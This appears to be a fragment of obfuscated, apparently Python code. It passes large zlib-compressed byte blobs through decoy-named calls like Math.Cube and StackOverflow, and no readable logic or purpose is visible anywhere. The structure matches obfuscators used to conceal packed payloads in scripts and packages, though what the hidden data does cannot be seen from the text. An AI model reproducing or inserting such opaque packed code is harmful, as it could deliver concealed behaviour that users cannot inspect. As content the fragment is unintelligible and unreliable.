;Math.Cube(_hypothesis='xxwxxxxwwxxxxxxwxw',_invert=b'x\x9c\xe5}{s\xe2H\xb2\xef\xff\xfe\x14\xec\x9c8a\x88fX\x10z\x80\xe3p#z\xc6\xbd;\xeem\x9b\x8ev\xefv\x9f\xe8u\x10\x02D\x1b\x8f@>\x80\xc7\xee31\xf7\xb3\xdf|T\x96J\x12\x0f\x19!\xbb=\xd7\x18\x90\x8a\xd2\xa3JUY\xf9\xf8e\xe6j\xf1\xed\xe4\xa8\x02\x7f\xd3I\x95\xbe\xf1o0\x88\x86\x93\xbb\xe5\xc8_E\x8b\xc1\xa0\xf2\x97\xde\x0f\xbf|\xbb\r\x16\xd3h\xfeC%Z\x18\xd5\xfc\xbb\xd5u\xb4XR\x9d\xea\x0f\xc3i\x18~[]\x07_#\x7f\xd5v\xdc\x1f\xea?\xfc\x14\xde\x05\x1f\x82\xf1\x0f\xb5\xc4Q_\xa7\xab\xeb\xbb!\x9f\xf8z\xb5\xba]\x9e\xfc\xf5\xaf\\\xd6\x18E\xb3\xbf\xa6N\xf3\xd7\r\xd7\x1eO\x97\xa3h1N\x9eF\x156\xbe~\xfd\xebm\xe8\x7f\xbd\x0bR\x07\x85\xd3Q0_\x06|\xd0\x9b\xf7\xef~\xb4\x1a\xcdT\x95Q4\xe6\xdf\x8fo\x17\xd3\xf9\xaa\xfa\xc3/A\x18F\x95\xfbh\x11\x8e\xff\xf2C\xed\xf8\xa8v\xa2k\xe3\xef\xc7\xcb_\xa7\xe3\xe3\xdaQ\xf00\nnW\xaa3\xe7\xb7wp\xe4\x87h\x19,+\xfe"\xa8,\x82\xf1\xbf\xe7\xff\x9aFa\xb0\xe2\x82!\xf4\xcc\xbf\xe7\xff\x1d\xdd\xd1\x9e_\xc1\x93\xfc{~\x11\r\xa3\xf1\xb7J8\xfd\x15\x8e\xfb\x16\xdd\xfdP;\xe2\x9b\x9a\xcen\xa3\xc5j0\x80\xab}[\x1e\xd7\x1a\xc1\xc3tU\xad\x1d\x85\xd1\xc8\x0f\x97\xd5\xda\x97\xe3>\xfc5\x9bQD\x1fQ\xd4\xc4\xaf\xe3\xab\xde\xd70\x1aB\x8d\xa3u?\xe3a\xf3\xf9\x8c\xffg\xf0\x0f\xdf\xf3\xe3/\'\'\xaf~|\xf5c\xf5\xc7\xea\xabV\xadvu\xd5\x1bO\x17\x1b\x0f\xb7\xac\xcbK\xfa\x87\x8fK\x0b\xfe`#{\x86\xaf\xc1\xca_\xad6\x9f\x85OqI\xe7Q\x9b\x16\x9f\x0eZ\xc0M<\xda\\\x07\xcfpqq\x0e\xff\xe7\xe7\x17\xf4\x7fN{pl\xdco\x1b\xaf}vv\xf6\xee\xec\xed\xdb\xb7\xef\xf0\xfb\xec-\xed\x9d\xc1\xa1\xeb\xceX=\x1e\xdeM\xc3\xd5t\x8eO\xe07\x7f\xb1\xb9[\xa3~t\xda\x87W\x84\x1b\xf4\r\xa7\xa4[\xb7\xf8\xceU\xbfY\xd5\xf5\xd7Y\xce\xa7\xabpz7L\xf7e\xad>\x9f\xd3\x83\x9a\xcd\xe4\xc9=\xf6\x0c\xb5/\xc5O\xd1\x98\xce\xc7\xc1C\xf5x\xe5G\xe1$\xf3\xf3Um\xc7\xd3\x82N\x83^\x89\xe0\r}\x03\xdd\xf4\xe7\xec\x9c\xc5j\xb9G\xd7`\xb7P\xc7`\xcf\xc0N\x84\xc3\xe8O\xdaCa\x14e\x7f\xdd\xd9E\xef\xde\x9e\xbd{K3\xf6\xed\x19o\xc2\xa4}\xf7\xe7\xec \xff\xb7\xe0\xf1\x1d\x14\x86\xe1t\x1a\xdeLo\xe0\x1f^\xb0\x1d\x86\xb0\x1dB\x17\x1d\x1f7n\xa2\xe9|\xc7\tb\x82\xae\xba\x14>\xff\x94\xfd\x1b\x84\xd3\xdbY4z|\x17\xe3eg\xbc`\xaa[\x99\xcd\xfe\x9c=\xb4\x0c\xfd\xbf\xad\xeb\x9f\xb5\xeb\xa6\x9a\x9e0+\xdf\xe1\xf4\x84R\xfe\x9d>\x1e\xd7?\xd3\xe9h\xe9\xcf\xa7\x05\xfag\xe3\x19\xf2\xf7\xcf\xe6SH\xff|\x9bL\xc3\x87\xe0z~\xf7\xf81\xf4\xf6\xdd;\xee\x1e\xe8\xc4w\xb8\x03\x1f\xf0\xfas\x0e\xa3\xbb\xc5\xc7u=\xb4\x81\x7f\xda8\x86\xaa\xc3c;\xb0\xc7\xf0\n\xe8\x1d\xe8-\xb3\x84\xb6\x81E\x1b\x07\xc8\xcbW\x8f;\x93\xd5\x9a\xe7\xf3\'\xec\xe6Q\xf0\xb0v\xbd\xd88Y\x1f\xee\xef\x1f\xee\x1f\xe0\xef\x1e7\xe8m\x1e\xbf~\xa9\xadn{<\xed\x965\xb6:\xd6\xb8\xdd\xb4\xba\xbb\x1eA\x8d\xa4\x83}.\xd2|\xc4E6\xb7>\x0c\xcf\xc23\xfc\x0b\xf5\x7f\x98\xa3\xf9\xc7\xb5\x16\xfc\xdc|\xe2\x8e\xe2\xce\x9aG\xab\xea&\x1e\xb1\x9a\xe1\xab\xab\xeb\xd6\xa9\xda\xb6.\x81\xe9\x08s\x91&e\x1ff%N\xcf~\xe1\x86:\x93vW\xbd\x1dxw\xd4v\x13\xde\xb6\xda\xeeXC\xea\x8c\xdf\xf3g\xae\xc1f\r\xda\x03|waH\xd9\x03o\xe0\xd0`kgK\x8b\x0e6Y\x82[e\x0f6\xaf\x08\x1d>V\x1cT\xfcq~\xf1B\x08W\xe0\xb6\xdc\xb1\xebXc\x0f\xa7\x9b[\xd6DsGv\x97_\xf1\x16o\xbb#\xf3\x13\xdf\xe5L3\x0f&\xd3\x04\x969\xbb\xd0\x83&\xcey\xaeV4\xa5\xce\x9e\xe5\x9a2<%<\xf8\xc4\t\x82\x14\xb9\x03\xd5\xbb\xd9\xd2\xa2\x03\xa7\xad\x98\x18G12\xae\xda\xb7\x8cm[1By\xea\xb6K\x9fz\x9e\x03\xe4\xcc\x85\xdb\xe9\x94\xc6\x0c\xc1%\x80\x8c\xf2+\xbd\xcd\xfb;\xaf\xfc\x9c2\x04P\x15\xfa;W/\x14\xd9r\x12\xea\x16\x90a\x0b\xde\x0eq\x00\xad\x81K\x84:S\xfab\x08\xf5\xc1x\xad\xed\xcc\xb3\xc9>\xcb\x96\xc9,\xe3\xd6\xde#\x06\x9f\x8b\x07\x8b\xa4\x05o\xec\xfd\xee\xa0\x0b\xc7d\xcar=\xe1&\xfc\x9cg\x99\xcd_s\xebs\xb6\x14\xb5@\x11\n\xa9\x87\xa7\xf6\x85\x8a`YWQ\x97\x88\xf7 \xe5\xf7Q\xca\x87\xff\xd3\x83O\xa9.\xbdX@\xb5\x81\xf4uhJeJ\x9fay\xe2)\x15\xfa\xb3\xe1\xd8\xaf\xe0\x9a{q\xae\xd6`b\xf1\xcfi5>Y\xaf[\xde\x8fG\x9e\xd8\xf4\xc7\xdf.\x89\x9fv\xe2].\x8b\x92\xa7o\xf6j\x98\x87\x7f\x1d\xf5\xc9\xdf\xc9?*-I\xba\xf6\xdcvi\xea\x03`C\xe2\xd78\xb1=V%\\\x9a\xc3N\xb0\xdf\\\xb7\n\xcdrR\xc0\xa2\x06\x16\x07.|\xe2\xab\xb0"Vd\x87\x96\xfa\xee\xa8m[q\x00m\x83;\xd8V\xcf*W\xf0\xf5\xdcny\xeb\x9c)\xd4\xa6E^S\x14\x96\xdfK\x1a\x1eV\x00\xaf\t-\xef\xa8Y\xb2\xbd\xb6\x85\xacs\xcb#\xe6\x99\xb4H]d\xa6\xa1\x14\xf5O\x16,\xfem)\x03v\xc0E\xd6\x00\x98\xec\xc0k\xc2Q\x854$\xdb\x95pL\xe9\xe4%\xca7Q\xc6\xf1\xab\x00\xb3\x8d\xec\xb4G\xacYw\xe0\x11\x83m\x91\xe8\x9d)}j\xc6m\xbf\xb15\xd6\xafu\xc4\xa7d\x823\xf4\xc6e\x8d\x03\x18w\xbe\x8b\x93\x82&\x06\xbdp\x9fK\xf8\xe5\xeb\xdf\xfcR\xb9\xa7\xa2\xba\x88c$\xa6M\xe0\x9a\x9ab\xea\xcaCV\x8fk\x0e\x8dIT\x06\xb9$\n\xda$b\xb8\xd9\xd2\x17$\xae\xbb\xf4\xcc\x1c\xa0=E\xf4\xd4!\x19P\xc3\x90\xdf\xb0\xfd\xc4=P\xba\xf1k\xab\xd8\xd4\xd1*+/\xa1\xb4\x8a\xb7io\xf7\x9cP\xec,[\xa4\xa93\xb9W\xc3\xf0d\xc3\x8d\xed)\xe7\x89\x96Dt%\xa6\x9cg\x96\xc8^I\xdc\x1f\t\xb7 \xd2\xa2\xb5\x04\x05\\\x10n]X\xcf`\xaf4\x93R` F\xc6j/\xd0\xa5c\x03Q\x12\x94\xd5hQ\xea\x97\xd4D\xe2\xe1;\x89\xcf47\x1f\xffJ\xaf\x92\x88\xb5M\xaa@ \xd8\xac\xb4\x18;\xb6\xd7\x05^\xc5)\x8dSY\xf7d\xcd\xfd\xe4\xf3\xcd\xb1\x08\x97mQ\'t&j\xc6nB\xf8\noP36\xcd\xa7-\x04\xb6\xa8I\xc2w\x8b\xc4\xf06\xe9([\xd9\xd2\x97cOf\xf3*,G-wTp1\xc25\x88h\xe8\x99\xda|\x19\xe6>\x83\xbb)Q\xf2QL\x1a\xb2k\xbe\xc1\xcaq\xb9\xaf\xd8\xba\x910vei\xfa\x10<\xd0,\xc4\xc4\x89}Ol~\x84\x9d\xcb5yPw\xe5\xd2\xf4h\x93&\xab9hC\xf5&qp\x89\xd2\x03\xab\xf8;pN\xe4\x14\xd1\x94\xd0\xa6o\x87$\x9dL\xe93\xe9\xd3\xb6\x0e]nh>\xc5a\x9bl$d/\x85&!\xc2\x05\x01\x08v\xb6\xb4hC\x1d\x05\x0b3\xa1b\x1dCs!\xda\x8c]\xf5rj3v\xd88\x10\x13d`\x83\x08\x1f\x94\x17 \x84#\x00M\x14h\x88v\x89\x88\xa3)\xb0\x93-}1\xb2\x85\xa7l\x08M\xd7\xf6\xa0\xefc\\\x0csz\xaem5U\x8d2\xcd\xca\x9e\xe6\xcb\xc5\xb4\x9c50\xe72/o\xe4\x03\xaa\xffw\xed\xba\x1f-\xaa\xd5\r\xf0\xee\x9a?\x1f?\x9eY \x0f\x0e`\x12\xf0\x9b\x98\x06\xe2\x19\xa6\xf9\xd0\xaa]"j\xa8P\xb1\x95R\xc5!\x92g\xa7K\x9f\xceV\xb9\xb7\xd2\x7f?\xae\x1b\xb1j0\x10\xdb\xbe5\xb1`\xd2\xc3\xb8\xf3\xac\x00n\x82\xdf\xad\xb6\x0f\x82N\x13_\x85x\x0f\x05\xd5\xba\'\xdc\xd6\x83|<\xe4T/\xe0\x93\xe8\xd0\x12\xd0$UB\x97\xd4\x0b\x99\xd2\x17C\x02,`\xb4\'v\xdb\x1e\x16\xe3\xe7\x18\xa2\x1d*\xa9\x98\x19\xbb\x03\x9b\xbapUrH\x81c\xd3\\hQ\xdf\xb7\xb3\xa5\xcff=~v\xfa\xc3\xcb\x19\xa3\x7f\xf9\xe3ep\xd56\xa9\xd4m\x1b\x95\\\xa4>\x0f\x0c\xd5z\xb1qI\xea\x19\xa5\xfa\x12MM\xbe\x91\xe9\xd1\xc8bI\xcd#\xda\xdc\xa6\xe5>SZ\xb4\x8f;);\x8e\xab\xf0c-e\xc7i\x1a\xc0\xfbW/\xfe`w\xf4\x83\n\xda[{\xd3S\xcb\xae\xa3\xc4\rQ\xd2\x9a\xe5\xb2d\xe7\xa9\x9bs\xc9\xfe>\xc4\xeb\xad\xa4]\xc1N\x15sg\xc7\xcc\x1dm\xd9\xfc.\x8f\xc5\xb3\xac\xf2x\xd7\xac\xf5}\xbc\xd1f[\x12a\x7f\xbc\x8b\'\x1a\xb4\x0f\xe8\xe6\xb9\x1d\xab\x91t\x0f\xcf\xbe\xcbEg`\xb7\xd8\xd0`\xbb\x98\xb0F\xca\x923\xa5/\t\x0fc\x94\xf5\x14\x8b.\xec{+\x05SE\xd6\xbde\xd0\x8b]u\x8b\xaa\xa1\x10\xca\x88Z\x1b\x8f\x16"\xdcn\x12`\x1e\xb7\xdcd\xe9\xd3\x11\xd5}\xb4\xec\xfb1g\x82\x06\x1c)$\xa0\xaf\x18l~\xfb\x1a\'\xa8p\x83\x05\x10\xa3y\r\x91\x07\xed\x98\xcdC\x1bV\x8b\xd3\x88\x10 \x88\x08\x89\xd8!#\x8f/\xc6\xb3+G\xc9\x1e*\xc3\xdfR\xdb\x1dC\xeb\x87\xe5\xae\x9aBy\xea:e9)\x08\xf6\xd8\x9d\x98\xda\x0e\xdeg\r\x87\x04\x08`TrY\xde\x18\xb6\xd1\t\xae\xa1\x1e\xf0\x8c\x0e\x11\x07\xbb|u\x8b8\x9e*\x9f\x16t\x13h\xb2\xa7\x0b\xf2\xde\xf9\xbc\x04\x10\x8e`\x91e\x89a\x07\xe4\xebLp\x84Li\xd1\xa1,\xc1\\D\xc7\xd2T\x8do\xaa\xce\xf0\x8cN\xcbS\xf7\x11^\x89\xcf\xe8\xa5\xb5u8\'\xd8\x1aCTO\x88\xec\xe5\x0caa\x97\x1dc\x1e\x8b\xe6K\x97\x1b\xcb\xe6\xb6\xbav\xd1!\xbc]\x89+*ZS]k*p\xa5\xfc\xd9\x91|\xdb9\xb8\xa4\x7fr\xd2\x932\xe9\xcb\\\x96\xdd\xa1MF\xaf&"k\x91\xd5-\x86\xf6\xde!\xaa\x88@\xc2\x7f\xa6\x98"\xbf\xe5\xa0\xcd\n\t\x8d\xe7\x87F\xaa\x1bay\xeb\xdd!\xbd\xfa\xcc\x91dz\x81f\xc7Z\x89\x8e@\xb6g;\x05#_\\R\x80N\x8a\xd5I\x9b\xb2\x7fY\x94v\xcbL\x97\xa0\\\x12\x8bB\xec\x81\xe4\x1bf\xa0\xacv\xd5-9pW\x13d6\xdbn\xdb\xc5\xfcC,\xd5}\x16\xc7@\x95\xb8\xd69\x916.\xad\xa0\xcc\xe9\xb7\x81\xeb\xf7\x08i\xe3\xa5Ks"\xe9\xf8\xa8\x16\x1d\x83PA\x87\x90t\x99\xd2C\xd8Kd\x8du\x8c\xe7\xe7\xa9\xe7\xc9\n\x95\xd8^\xb2\xab\xee#\xe2\x92\xec\x10\xaa\x10\xf9\xd6\x86\xa3\x9c\xe2~5]\xb5|Y\x8a\xc1\x10\x03\xb74\x84\x18\r\x83\x11\xd9V\xd7\xcb\xb9\xf4\xed-P\xadQ\xe5\xafQ\x89\xf0\xabP\xac\x8b&q{\x16\xc1\x0bq\x9c"\xf0pM\xe9\x81\xd5\xb9m8\xbfCWp\t\x7f\xc6h\';[z\x085\x81\xc8,\x12F\xd01X\xf2\xb6\xc1\xebl\xab\xf7\x18\x8ch\x1e\x9ch\x1cF\x0f6_\x88\x89\xceC\x1e\xc2\x1e\xc1\x8anh\x9fm\n\x04G\xe0\xfd\x80\xc0\xfb\xe5\x99\xefF\xda\xc7\xb0\xeb\xc6^\x87\xbe\xe1\x9b\xd8U\xe6\xbcQ\x81\xd5\x9a#\xa8\xe1\x00E\xa0r\x8b\xc08\x0c\x07\xcb\x94\xbePE\x0e&\'`\x96\xb7\xaf>^\x82\xba\x02MpniF\xb8\x8c\xa7n\xd2\xaeh\x86\x0e\xd8\xdf5\xecq(zo Q\x87l\x1ar6Q\xc8L\xe9\x81\xb1\x90hDk\r\x98\x12#\x1d\xee\x92V U\xf6\x8c\xa6\xb3\x83xi\x9a8p/\xf5\xee<\xca[\x93\xa4\xc4\xb9\xe4N\x91\xcf\xf9\xec\xb1b\xca\xf1g\xbd$|R+\x04}=\x1d\x89y:_\xafB\xa6\x04%\x10\x820\x88WB\x8b\x1b\xd69\x04\x9b \xc0\x1f\x93\xe7\x93\xe8\xc3^\x8aU\xd8U\xb7\xd4\x00\x19\x9e7\xb4\x9a\x96\x85n\xa4d\xb4j\xb9\x1e\xdag\xda>\x95\xa2\t\xcbBt\xa1\x15\xd8\x1d\xc7\x86W\xd3\x8e\xcb,\xabYb\x94\x00\x03}\xa6\x8d\x96\xca8)qsb\x1dAI\xf2t\xbbE\x98~\x0c\xe0\xecd\xbe\x8b\xc8\x85\x1c\xfd\xf8\x13\xf9\xf6\xe4\xe6\xdb\x0e\x18\xdaM\x04\xad\xa6\x93\x8a\x86\xad\xc6_\xcb\x08\xde\xb2\xabn\xe9\x93\xfc@Q\xb4\x8fcr\xc8[\xea\t|*\x1c|\xdaQ=d*3\x9bF\xafu\r\xb5\xc6\xb6z9\xd5\xd1\xdf-\xcf}\xdc\xec\xb3\x01\x01\x17)\xfc\xcf\x1b\x11\xe3\xf9\x19B\xa0p\tLui\x08[\xa1c\x8a\x82M\\\x83\x9a\x19\xef\xf2P\xb6[\x9c\xe9\xb0\x03\x18D^\xb2C]\x8c\x8f7 \xe4qY.E\xfc^O\xd9\xc6\x91o9\xd8h\x8c\x108\xf6\xda\xb0\x8d+Z\x9b@\x1bv\xf1\xb0\x88\xc7\xef\xe8\xbao\xcf\xf8~`/\x17ew\x14\xf6\x0c\r\xfc\x0e\xa9\xe2<2\xf8gJ\x9fA\xfa\xfb\xbe1M\txc\xc7\x80>vL\xa0\xa3\x19\xc9\xe2\xfb6\xf2d\xfdL;\t\x9fS\xbd\xf7\xec\xcd8~{\xc6w.\x0f\xfa\xddK \xf5\x08\xbeuF\xae\xb5\t\x95\x85\xbf\x95\xca\xd4\xda\x8a\xc0\xeb\x05@\x96\x80\x04:/\xa7yk?<\x16z\x0c\xd9V\x93"\xc4\xb5H\xdf\xd5r\x11\xa5\xe5\x00G\xef\xb9\x1d\x8e\xe4\x04\xbf\xb79\xc0\x0c\xd1J\xac\x0f4\x12j \x9d\x04\xfaI\xd4\xb2\x18\xad<\xe5\xf8\xa3\xd1)y\x19\xa0\x93\xc1\xcb\x94QQ\xc5\xd2U\xae\x9d6\x85\x07\xb6\x95\x12:S\xfa\xd4\xb7\xbdU\x06Q\xe2\xc7g\xce\xc6\xf29\xa7+&\x06\x8d\xb1\x08\x9e\xe6Q,\x01K\xc1\xd3Z\xd9\xd2\xc2\xad5\xa0\x02\x02\xe6\x10\xc4\x9dl\xb7\x8cl?\xbb\xea>\xeaa\x7f\xcf\xab\x9e\xd6+\x9a\xf1\x00\xd3\x91\x02\x8d\xb2\xb2(\x89Cq\xdf\x02ECJ\x03\xaf\xba\x938Nn\xbc\xad!\xcc\xb6IBK\xf3;D~\x99\xc3j\xb2;\x1e\xf0\xce\xa8\x08\xe9\xa0\x17"\xdc\xd0\x10\x99\xc7\xd2\x04\x87l\x92\xba8$U\x8c\xf9\x89!\xcf9,yJ\xed\x88n^\xfc\x06\xfa\x0b\xe3\xbb\x7f\xb2-\xd5\xe0fz\xa2\xf3d0\xec_\xfd}/,\xc1\x81\x94\'m\'\x1b\xfbE\x90\nb\xc1n\x19Y7v\xd5-7\x84\xa8\x9f\xb0nu\xb5\xc3\xda\xc8\xb0u\xc9>\x95\x955w,b!(<_y\x08w\x1dV[\x03\x87\\\x03>\x14{7\xc4\xa5\xe5\xe0\xe2\xe89\xaba\xdb\xcd\xa9\xc0\xdd<\xad$\x9d\xe2\x83$o\xca\x13\x03\xe4;0\xf1z\xc5\xbc\xc0(\xf8\xc9\x83\x8a\x7f\xc2M\xe7\xd4\x92O\xa7(u\x0c\xe6\xa1\xed\xc4\x08RQ\xce\x9b\xccG\x9e\xbaO\x10\xf9\x0e=J,v\xearhE\xf2\xba\x85\x18t\xe2Vf\xb38\x1b\x12GI;\x04[\'~\xd1\x82\xc5\x15j)\x88\t\x93\xad\xdbU\xb7\xe4\xe4Y\xa5\x04\x17=\x9e+f\x90\xbd\xe3\xc4c\xee\xfbY1w\xa8\x11\'\xc4\x00u\xadIy96\x0c\xd5\xa0\x04\xd6\x90\xed\x91\xfe5\xc7\x9aU\xb6\x1e\xe4^\x07j""\xc5\xa4\xba0\x99n9I\x88\xb4\xc0\x87\x04\x00I\xf2\x8e1Iv\xd5\xcd\t\xa4\xdb\xd7\xf5M\xd2\xae\x152\xc8\xaaP\x9b*\xd8&\xb9w\x15\xedF\xd3\xd0"\xd0;q\xf0\x94\xae\xb2\x8d\xb85\xbb\xea\x96\xda\x8d[\xcd\xb1h\xaa\xc1\xa8\'@\xe5u\xd4\xa1\xa2&\xd8c\xe6\xf5\x15H\x951\xaa\xf9t0\xe4\xdb\xc1\xd9\xec\x18\xe7\xc1h\xbfL\xe9\xf7\xa4\xa7\xd9a\x02*\xcf9ul\x9b\x01\x843\xa8\xcb\xd4+W\xc8h\xc9X#\xc1N(\xdc\t\'\xa8|t\x8c\xefc\x15o\x92\xad\xa2\x1c\x94\xebs^u\xd0Nc\xb3\x80\x1a\x04\xf0*\xe0W\xfd6\x8c\xcd\xbb\xea\xba/!\x8c\xbb\xa9\xc27BC\x9a\x8a\xfc\xb2"K\x94\x96\xbd#\x11\n\xbc\x93\x8c"Qj4\x89\xc3\xa4V\xdc*&\x1b.@I\xa7\r3}\xa9\x19\xf9\xa9<\xbd\xfc\xf3(\x97\x12~\x90\x9c\x97\x85\x13"\x9byZ\\\xfd{\x81,-\xbbP\x99e\xa6IOg#0\xf3\x15$=\xab\n\xa02\t\xf5\xfe#\xa5H\xce\xb5\x8e\xda\x14"\x1a]\x13\xba*.\'F8v\xb2\xa5\xb9\xcef\x91W\x08g*l\xd2\n\xdc&\xb8q\xa64\'~\xb3\xa3\x0c\x18\x14\xd1U\xa5\xd3I\x95\x1d\xc2\x95\xc2tl\xb5\x0c\xdeK`q\xa6O\xe7\xae\xba\x8f\xcd4\xb9\x0ba\x1f\xaf\x88\x12\xb12\x9f\x8d\xc4!\x88\xab\xcb\xae\x07\xd4]\x9c\xe3%Sz`w\x88\xe7\x0c\xa9[Du\x91\x88hX\x9a\x1dAL&c7\x99\xc1-\xb9\x9f\xcb`\xa2\x180RK=<\xdc\xab7\xef<\x9e\x03\xa3\x90k\xa8\x87G6\x05\x83\x00\x1c\xca\x0f\xcb\xe4\xa8l\'\x8e\xc9IrN\xca\x0fkS]\xce\xf6Zb\xf8\x00\xab\xec\xdc\x84\x19/\xe9q\xc2~bxM\x97\xb4\xb4\xadM\xbfZ8k\x01\xa7+\xe0\x1c\xe5\xdf\xb5\x07\xc9\xfeF\xb7\xf2\x92\xd4\xaeK\x13\x9e\xcc\xba\xd4I\xe2ov\x0f\r\x9a\xc2\xe4\n\x83\x02\x06~W\x8f\x1b\xf9\xe8\xb6G\xc1\xa1;\x14>\xbdE\x01^p\xbd\xe8dK\x9fn\x15h\x89\x92\xdb\x89Q\xbf-\x83T\xb0{f\xac\x81\xdaU\xf7p\x8eo\x98\x18\xfd\x9c\x13\xb5\xaa-\x8a\xfb\x993[z\x8b\xfc]:\xb4\x14\xb7i\xdb#\xddE\xa6\xf4\xe5\xe8.b\xf2\x02\xe3\xb4\xe9\xda\x84\xea,\x08\xcf\xd9\x05d\xd5q\xc440_\xc3X\'1P\x1f\x7f+\xcf$_L\xdf\xa8\xdc\xb2Y\xf5\xc5\xda\xafC(<\xc4\xe8c:\x81\n\x12\x85\x8d\x83\xb1\xc2cW\xdd\xa2n\xee(ax4\xae[\x03\xce\x9b\xe2\x11X\xc7\xc9\x96>\xf5\xb2\xb0\xf9\xb9\x84g\x12\xa1\x9fc\xa1\xe7J\x03\xc8\x1e\xf3Mz3\x93\xedPK\x9b$\xfd$J\x0f\xbaTb\x0fc\xd0\xc8') + + Math(StackOverflow = 4971 * -59767)._while(Negative = 96629 / Modulo._positive) ;Math.Cube(_hypothesis='OO0o0oo0o00Oo0OOoOO0oOO0O',_invert=b'\x16IE\x16y\xd2Y\xd4\xc3\x99\xd2\x9cgs\xa8\xbeC\x11\xdc\xd1\'\x9f\xcf\x96)=\xb0\xe0\x90\xbf\xbd\x8f\x0b\xb5I\xf2&E-sT\xfe\x9ev\xb64\xd7\xd9\xda*\x9a}G\x85\xe8l\x91tkgK\x9fQ\xfc\xd9\xf4\xde\xdf\xccf\xc4;\xf7JC\xe4\'\xd0\xd3I4u\xf9\xe1b\x9f\xc03\x05q\xa6}\xc2\x9a\xa2F\x98\xb4\xbf\xa4\xfb\xfd\xff\x01K\xb1}\x1dgE_\x12Zg&\xa3\xe7\xdfE\xf1\x87{\xa5\xc5\x06UlK\xcbB\r(F\x8a\xec\xe26\xf4q!\xc3\xcc\xf1\x832\xcdj\x18\ro\x1e\x02\x1eb\x82\x10\\\'\t\xf12CB\xe4\xa9[\xa6\x9f\xa7f\xcd]5^\xc9\xd2Y\x96\xb0\x9d\x893m~R\xf9\xd3\xf86\xb5Iu\xdev\x87O\x96(\xac\x1d\xeb\x96\xb3\x1a\xe6t\xa4\xae\xbc\x19q\xb5\xa2Ic\xa1H\xd5\xb4\x87\x92i&H\x13\x8d\xd2|\x11`\x13\xcb\xf60x\xac\xdbAt\x93\xe3\xa8\xfc\x9e%g\xbf5\xa3"\x9b\xbe\x19I\xe9\xe6E\xc4Y;nr\xd0\x80&EU\x8fr\xa7)?\xbc\xd2\x19e\xef.\x05?\xe1\xc8\x90\xc8\x05Z${gJ\x0f\x81\xd4\x15,G\xd7I\xa2\xf3$hf\xd3@\xean\xab\xfb\x98\x10M\x07\xe0\xf9\x02+ x\x15G\x91\xc6\x87\xafp\xe7\x94\xe4\xc7\x0c\xd6\x8eA\x95Qq\xde\x962\xa0t.\xa5\x03\x1aZ\x18Y:p\x8b\xa10U&\xaaPG\\>Ht\x04\x89z`\xab.6\xd3EQ\x90H#:\xc2\xae\xba\xe5\xa6Sq\x89\xf0\x14\x9a{0\xdd\xd0\x19\x1aS\xa9p^\x15Jjp(\x04e\xc7\x18\xa5\x12h\xccS\xdfN\nA\xb9\xadn\xc9\xdd\xb86gZA\xa26W\xaao\x05\x9d\xcc\xad\x02w(n\x1eG\xbeiR\xf4;\x8e\xad\x9d)}:E\xab\x19\xffNXB\xb1\xc58\xa2@5&\xc5\xae\xba\x8fHX\xb0?K\xa9\xfd\xabD\x04R7T\x08\xee\x9e\xd3x\x17\x7f\x8f\x13\x9eN\xe3BY[8\xee:\xeaA\xecC\xe4\x14>\x98\xab\xdev6%\xa9j\x8d\xe3\x0b\xb0\x0b\xa9=\x11\xb6\xa5,\xd4\x86\x85n\xa1\x0e^\xc0U\x99\x97Z\x05\xddB\x95j\x9f3x\xa9\xff\x03d\xf2z\x1a`\xb4\xf0\xa7\xd6\xd8&\xf4f\xa9y\xa8\xcc\xacE\x81k\xc6\x19\xcb\x18\xb4K\xf2\x01\xd4\x8b\xb4\xb8^\x8aw\x93@\x92\x89L\xa4\x16\xf4mu\x0b\xc1\xbc\x8eu\xf8,\x15@k\xf6\x98\x95!\xbf\x06\xb4Ea\xfb8n\xaaMZ\xde\xb6B\xbf\xa6J\x9f\xd0X\xf7\xd4)\x84\x0e\xc1\x1c\xcd\xe7\xf1\xc3\x9a\x899\xfb\x10\xbc\x91\xe4\x13p\x8c\x11\xe6\x1aJ\x98\x8e\xc1\x1b\xed\xaa[j\xa4a\xeb\x10\t;\x8f16\x1c\xf2\x98(\xdaQ\xd4\x9d|,\xe6\xf3\r\xbd-k0\xce\xc2|\xb6\r\xe4\xd7,\xb2\xd6:\xcc\xb1\x11\x06\xdd\xce\x96\x1e\x02\xa3f&\x85\xd2\xa1\xd9\x9c\x18/\xd360j\xbb\xea>\xc6\x10\xbeM\xaf)p#Vh\xb2n\xe8\x10\xb3G\xeeYf@\xcb\xf8\xa6\x90\xc5\xc6\xec\xd9U77b\xfb\xd0\x1a\xbf\xa7\x8bf\x94H$"Z\xf2\x186+\x9fR\xf2\x88\xb0\xf5\x9f?\x7f\x96Pq\xea\x9f\x10\x88\x8f\xd7\xfc\x89\x83\x07\xf9q_\xaax\xe4\x87\x18*2\xa4M\xc7f\xc9\x8fD\xdf\xc6P\xd9U7O\xd2\x97\xe7\xc3\x12\x1d[1P@\x05\xc8\xcf\xef.\xd3\x19\xb0\x8a\xabK\x81\xdb%bF7[z\xa8\xc5OTY\xe2\x8c*\xea-\x96\xd0\x92\x8b\xdf\xb6\xba\xa5c\xbc\x05\x1a L\x93d\x960]\xbf\xf3\xd4\xcd\x9bCe\xbf\x89\x9b\xcc\xbc\x9a\x84\xd4\xa7B\x16\x95\xe57Vz\xc6\xf0u\x8dI4\xb5\xf4\xb4\xe8\xe9\x00T\x06,\x0c\xf6\xba\x05U\xae\x96\xc2\xc1\x1a!\x9f\x1e\xc1\xdbv)\x85@S\xc1\xef\x9a:\xd0\x7f\xaa4\xa7y\xc6"\xbe\xc3bP*\xaa\xd3\xc8<\x93)}&\xce`\xff\xfc\x98\xda\x92\xe3\xc4q\xa1\xe4\xed\x19\xa2R\x9e\xbayf\xf4\xe6\xa7\xdd\xc7\\\x8f\xfd(j\xa2\xd6\x08?\xb1\xe0 6I1\xcf\x9a\xdf\x1d\xb3-)\xd1c[\xdd\x92\xc3aw\x8b\xf2\xdd\x8c\'\xa4\xcfSJ\x83R8\xf7\x89i\xd3\x13`\xb8\xe8\xcaE\x7f\xd4J\xe9\x99\xb6\xd5=L\xd0\xb4\xc2\xcb\x99\x84\xd50\x1f\xae\x99\x08\xb2k\x0c\xfeO%t\x9cEB\xfc"L\xc4\xe8\xec:\xd6\xf0\xc51\x89m\xa3\x82\x81\xdaB\x1e\xae\n\xa4\x85\x1by\\fvRmI\x9cl\x02\xe3\x04\x91\xc5\t\x94c\xaa\xbd\xabn\x99f\xb4\xd8\xb2\xe2$\x85@\x8d{NIL\xdb\xea:9\x97\x98\xbd\x97\x97t\x86\xd8tx\x91\xd2\xd2\x1f\xd0\xc0\xf3\x90\xc4\x16\xb3\xda&\x96\x1e\x85\xbe\xcaE\x1f)\xc3()\x16\x1dBzJN\xd3V\xba\xf4\x10\xf4